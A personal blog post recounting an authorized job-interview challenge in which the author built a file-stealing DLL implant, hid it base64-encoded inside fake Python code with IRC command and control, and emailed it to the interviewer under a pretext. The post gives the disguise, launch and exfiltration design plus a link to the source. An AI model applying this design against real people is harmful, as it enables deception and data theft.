How to collect a file from someone…
I am currently exploring a few options with regard to my current employment, and one of the companies I interviewed with presented me with choice of challenges I could do. I had basically 48 hours (during the middle of the week) to complete one of the following (I have redacted some of the details at their request):
- Draw a set of bubbles of user specified size, and leave no space between them
- Create a tool that would exfiltrate a file from someone’s desktop (and socially engineer them to get them to open it)
- A secure chat client
I chose the second one, simply because it seemed to match up with my skill set the best, and seemed reasonably challenging as a three evening project. The third one seemed like I could basically take an existing chat client, and just use some RSA on it to make it secure. And the first one just seemed boring. So lets dive in.
The first thing I considered was how I was going to socially engineer my target to get him to open it. I figured this was a good first step as that might shape how I did the rest of the challenge. I started down the route of searching around about him, as I already knew his name, location and place of employment. But that felt creepy.
So I decided that I would send a solution to the bubble problem, as he was already expecting an email from me. But then just have that code kick off my collection agent. I could write my agent in C++, and then use Python’s subprocess and rundll32 to kick off the DLL. It seemed perfect:
- While Python is pretty powerful, no one really considers it a ‘dangerous’ file format. If you see a vbs file, you assume its a virus. Python script? Whatever, just run it. Its easy to open the source, so it must be ok.
- I could base 64 encode my dll in there, drop it to disk, and run it
- If I put enough Python files in the solution, then it would not be obvious what was going on.
Perfect, so I can write this as a DLL.
I wrote a DLL in C++ with a heavily object oriented model. In my day job, we do a lot of C style C++ development (what one of my coworkers so succinctly called C+). There is no real reason for it, other than the fact that everyone has done it that way. I have been pushing for us to switch, but I figured this was a great experience to jump in head first to practice a bit.
I also needed an ‘always up’ way that that I could do my collection. A tried and true method is to just use IRC as a command and control server. Although, in all honesty, I wasn’t able to get real command and control because of the time constraints. Its probably better that I was time constrained, or I might have built an implant that could take tasking.
In the end, I set up the connection with IRC, and then start a ‘survey’ (which just looks for ~/Desktop/flag.txt and sends it back). Hard coded. Not pretty, but it worked in my testing.
The second part of this was to ‘socially engineer’ the target to run the implant. This whole part was a last minute addition (literally 11th hour, as they wanted it by midnight and I started this part at 11pm). I almost decided to actually do the bubble challenge, but I was using subprocess.call(‘rundll32 mydll.dll,#1’) as my method of kicking off the DLL. That is a blocking call, and while there are ways for me to kick off a function as a separate process in Python, it really came down to time. So I wrote some stuff that looked like the draw script (with turtle), dropped a bunch of Django files into a directory structure to make it look legit, and threw my base64 encoded dll in a file (a few folders deep).
The social engineering part of it was an email that basically apologized for not having more time to work on it, and that it should work. When its run, it prints and error and hangs. At this point, I just need the python script to run for about 10 seconds for the connection with IRC to get going. According to the IRC logs I got this evening, he let it run for about two minutes, which was more than enough time to get my collection!
I was able to talk to my target afterwards, and found out that the whole thing worked fairly well except for two things:
- My email didn’t completely fool him. He said it was one of the better attempts he had seen for this challenge, but that he is pretty suspicious in general. Oh well.
- I didn’t statically link all of the required libraries. Although considering I did zero testing outside of my dev box (again, time), I consider this a pretty big win.
So sweet.
Things I didn’t have time for:
- Persistence — probably not needed because its just a smash and grab, but I was going to drop it in Appinit.
- Allowing it to get tasking — connect to the IRC server and have a bot give it dynamic tasking. This would have involved writing a protocol to some extent, and was overkill. Easy to skip in this timeframe.
- Defensive programming — I did mostly check my return values. Mostly. There was room for improvement there.
I will drop this in Github shortly (having issues now), but here is a zip of the code: https://www.dropbox.com/s/5ecn7jkxbh791fh/FileCollection.zip?dl=0
